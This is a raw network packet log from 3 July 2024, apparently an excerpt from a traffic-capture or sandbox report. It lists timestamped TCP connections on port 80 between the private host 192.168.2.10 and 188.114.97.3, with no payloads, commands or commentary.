                                                    Jul 3, 2024 16:42:09.483191967 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:09.488240957 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:09.488317013 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:09.488838911 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:09.493732929 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:09.839222908 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:09.845016956 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:09.935415030 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:09.978768110 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:10.468069077 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:10.468091011 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:10.468147039 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:10.532926083 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:10.537894964 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:10.651508093 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:10.653237104 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:10.658335924 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:10.935858011 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:10.978876114 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:11.466447115 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:11.472281933 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:11.511039972 CEST4971080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:11.515903950 CEST8049710188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:11.515971899 CEST4971080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:11.516130924 CEST4971080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:11.521070957 CEST8049710188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:11.572489977 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:11.575800896 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:11.581033945 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:11.860438108 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:11.869474888 CEST4971080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:11.874447107 CEST8049710188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:11.874489069 CEST8049710188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:11.962743044 CEST8049710188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:11.978765965 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:12.088196993 CEST4971080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:12.266293049 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:12.267296076 CEST4971180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:12.271934986 CEST8049707188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:12.272027016 CEST4970780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:12.272167921 CEST8049711188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:12.272262096 CEST4971180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:12.273222923 CEST4971180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:12.278031111 CEST8049711188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:12.307713985 CEST8049710188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:12.478867054 CEST4971080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:12.645021915 CEST4971180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:12.650005102 CEST8049711188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:12.741036892 CEST8049711188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:12.791517973 CEST4971180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:13.098172903 CEST8049711188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:13.272932053 CEST4971080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:13.273058891 CEST4971180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:13.274938107 CEST4971380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:13.280128002 CEST8049710188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:13.280142069 CEST8049711188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:13.280153036 CEST8049713188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:13.280174971 CEST4971080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:13.280244112 CEST4971180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:13.280246019 CEST4971380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:13.280425072 CEST4971380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:13.285456896 CEST8049713188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:13.684294939 CEST4971380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:13.689770937 CEST8049713188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:13.740359068 CEST8049713188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:13.822535038 CEST4971380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.105528116 CEST8049713188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:14.291534901 CEST4971380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.292665958 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.296930075 CEST8049713188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:14.297003984 CEST4971380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.297475100 CEST8049714188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:14.297833920 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.297962904 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.303073883 CEST8049714188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:14.651113987 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.656306028 CEST8049714188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:14.773724079 CEST8049714188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:14.822557926 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.853235960 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.859446049 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:14.859529972 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.859704018 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:14.866027117 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.122445107 CEST8049714188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.216129065 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.221185923 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.221199989 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.221273899 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.221278906 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.221290112 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.221334934 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.221350908 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.221354961 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.221359968 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.221369028 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.221370935 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.221395969 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.221405029 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.221405029 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.221442938 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.226521969 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.226536036 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.226546049 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.226553917 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.226572990 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.226582050 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.226609945 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.226665974 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.226690054 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.226699114 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.226763010 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.226819038 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.226869106 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.227005959 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.227056026 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.231647968 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.231712103 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.231714010 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.231760025 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.231939077 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232028008 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.232074022 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232124090 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.232167959 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232177019 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232218981 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.232222080 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232284069 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232338905 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.232347965 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232356071 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232391119 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.232436895 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232446909 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232495070 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.232928038 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232938051 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232945919 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232954979 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232963085 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232970953 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232979059 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.232980967 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.232995987 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.236922979 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.236943960 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237096071 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237104893 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237116098 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237154961 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237164021 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237173080 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237267971 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237354994 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237363100 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237404108 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237412930 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237488031 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237529993 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237540007 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237596035 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237704039 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237714052 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237721920 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237756014 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237765074 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237931013 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237976074 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238081932 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238152027 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238162994 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238178015 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238277912 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238289118 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238336086 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238404036 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238415003 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238431931 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238502026 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238512039 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238611937 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238672972 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238682032 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238689899 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238733053 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238742113 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238786936 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238909960 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238919020 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238926888 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238965988 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238975048 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239017963 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239145041 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239154100 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239161015 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239171982 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239180088 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239306927 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239370108 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239378929 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239804029 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.273272038 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.308759928 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.323924065 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.325289965 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.330410957 CEST8049714188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.330519915 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.331698895 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.331779957 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.332123041 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.338761091 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.416306973 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.682183027 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.687172890 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.781455994 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.822570086 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.129295111 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.213160992 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.278706074 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.279670000 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.284337997 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.284395933 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.285212040 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.285290956 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.285402060 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.291227102 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.435770988 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.525665998 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.635624886 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.641309023 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.745060921 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.801539898 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.949011087 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.025659084 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.077045918 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.077164888 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.078006029 CEST4972280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.092133045 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.092148066 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.092160940 CEST8049722188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.092187881 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.092220068 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.092252016 CEST4972280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.092459917 CEST4972280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.101618052 CEST8049722188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.387125969 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.392071009 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.392155886 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.392743111 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.397578001 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.408371925 CEST4972280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.454623938 CEST8049722188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.468975067 CEST8049722188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.469286919 CEST4972280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.565318108 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.575295925 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.576411963 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.579336882 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.584363937 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.744534969 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.751724958 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.751749992 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.868181944 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.932447910 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.937685966 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.994554996 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.051175117 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.181950092 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.210037947 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.294574022 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.397026062 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.478873968 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.563393116 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.563395023 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.564426899 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.569370031 CEST8049728188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.569436073 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.569711924 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.572052956 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.572066069 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.572120905 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.572134018 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.577904940 CEST8049728188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.916588068 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.922349930 CEST8049728188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.021759033 CEST8049728188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.088186979 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.390098095 CEST8049728188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.479408979 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.516562939 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.523878098 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.523982048 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.524100065 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.528983116 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.869524002 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.875020981 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.990917921 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.088148117 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.323458910 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.450001955 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.450624943 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.455566883 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.455646992 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.455785036 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.460613966 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.472368956 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.476275921 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.811794043 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.817056894 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.931277037 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.994399071 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.262813091 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.401215076 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.401938915 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.406346083 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.406409979 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.406774044 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.406837940 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.406968117 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.411751032 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.760194063 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.765234947 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.859070063 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.994381905 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.196830988 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.291264057 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.325340033 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.326114893 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.327132940 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.332595110 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.332659960 CEST4973280192.168.2.10188.114.97.3
